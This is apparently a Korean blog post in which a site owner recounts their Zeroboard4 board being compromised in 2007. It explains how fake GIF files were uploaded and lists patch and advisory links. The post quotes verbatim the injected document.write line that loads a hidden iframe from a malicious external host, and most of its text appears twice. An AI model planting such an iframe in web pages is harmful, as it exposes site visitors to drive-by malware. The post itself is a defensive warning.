d.xin8.info/daipi/css.htm (☜ 주소창에 쳐보시면 절대 안됩니다.)
어찌나 놀라고 당황했던지, 홈페이지를 폐쇄해야 하는거 아닌가 고민했었습니다.
지금은 어느정도 진정된 가슴을 쓸어내리며,
오늘 제가 겪은 『제로보드4 원격 실행 보안 취약점』의 생생한 경험을 포스팅합니다.
d.xin8.info 에 관련된 검색결과를 여기저기 뒤져서 알게된 정보들 중 유용한 링크들을 열거해보았습니다.
정보를 제공해주신 모든분들께 진심으로 감사드립니다..(그대들이 없었으면 어쩔뻔했어;;)
대충 요약을 해보건데,
제로보드 회원가입시 사진파일 업로드를 통해서,(혹은 보안패치가 안된 하위버전의 write_ok.php 업로드를 통해서) 그리고 lib.php 파일을 거쳐서(?)
제로보드의 icon 폴더에 include.gif 혹은
제로보드의 images 폴더에 admin_info.gif 파일을 만들고,
이 파일들은 이미지 파일을 가장해서, 소스내에
document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");
를 심어놓습니다.
그리고 _head.php 최하단에 자바스크립트 실행문을 넣습니다.
말그대로 원격/실행/보안/취약점.
아래의 캡춰이미지는 제가 떨리는 가슴을 진정시키며, 침착하게 대응했던 내용입니다. -_-;
꺼져닷컴을 방문해주시는, 그리고 꺼져스킨을 사용해주신 분들중
저와같은 피해를 당하지 않으셨으면 하는 마음에 포스팅합니다.
(여러분! 회원가입폼에서 사진업로드를 당분간 막읍시다.)
어찌나 놀라고 당황했던지, 홈페이지를 폐쇄해야 하는거 아닌가 고민했었습니다.
지금은 어느정도 진정된 가슴을 쓸어내리며,
오늘 제가 겪은 『제로보드4 원격 실행 보안 취약점』의 생생한 경험을 포스팅합니다.
d.xin8.info 에 관련된 검색결과를 여기저기 뒤져서 알게된 정보들 중 유용한 링크들을 열거해보았습니다.
정보를 제공해주신 모든분들께 진심으로 감사드립니다..(그대들이 없었으면 어쩔뻔했어;;)
참고링크 :
▶ 제로보드4 원격 실행 보안 취약점 패치 #2 - by zeroboard.com의 zero님 : 2007.11.07.
▶ 제로보드4 원격 실행 보안 취약점 패치 - by zeroboard.com의 zero님 : 2007.11.01.
▶ [긴급보안]★MS XMLHTTP 4.0 Active X Control 원격 코드 실행, 제로데이 취약점 - by 쿨~~님 : 2007.10.30.
▶ [제로보드4] http://d.xin8.info/daipi/css.htm 관련 주의 - by Parker Falcon님 : 2007.10.30.
▶ 제로보드 및 제트오디오 사용자 보안관련사항 - by php스쿨의 신의삽님 : 2007.10.29.
▶ 제로보드4 원격 실행 보안 취약점 패치 #2 - by zeroboard.com의 zero님 : 2007.11.07.
▶ 제로보드4 원격 실행 보안 취약점 패치 - by zeroboard.com의 zero님 : 2007.11.01.
▶ [긴급보안]★MS XMLHTTP 4.0 Active X Control 원격 코드 실행, 제로데이 취약점 - by 쿨~~님 : 2007.10.30.
▶ [제로보드4] http://d.xin8.info/daipi/css.htm 관련 주의 - by Parker Falcon님 : 2007.10.30.
▶ 제로보드 및 제트오디오 사용자 보안관련사항 - by php스쿨의 신의삽님 : 2007.10.29.
대충 요약을 해보건데,
제로보드 회원가입시 사진파일 업로드를 통해서,(혹은 보안패치가 안된 하위버전의 write_ok.php 업로드를 통해서) 그리고 lib.php 파일을 거쳐서(?)
제로보드의 icon 폴더에 include.gif 혹은
제로보드의 images 폴더에 admin_info.gif 파일을 만들고,
이 파일들은 이미지 파일을 가장해서, 소스내에
document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");
를 심어놓습니다.
그리고 _head.php 최하단에 자바스크립트 실행문을 넣습니다.
말그대로 원격/실행/보안/취약점.
아래의 캡춰이미지는 제가 떨리는 가슴을 진정시키며, 침착하게 대응했던 내용입니다. -_-;
꺼져닷컴을 방문해주시는, 그리고 꺼져스킨을 사용해주신 분들중
저와같은 피해를 당하지 않으셨으면 하는 마음에 포스팅합니다.
(여러분! 회원가입폼에서 사진업로드를 당분간 막읍시다.)
'기억 저편의 것들 > 미분류' 카테고리의 다른 글
회원가입시 특정단어를 아이디와 닉네임으로 쓰지 못하게,,, (0) | 2008.01.27 |
---|---|
방명록의 스팸차단 꼼수 (2) | 2008.01.22 |
태터툴즈에 스냅샷(Snap Shots)을.. (0) | 2007.09.27 |
관련글(Related Entries)이 있을경우에만 보여주기 (0) | 2007.06.01 |
제홈에 비밀댓글 및 쿠키활용 기능이 추가되었습니다. (0) | 2006.02.22 |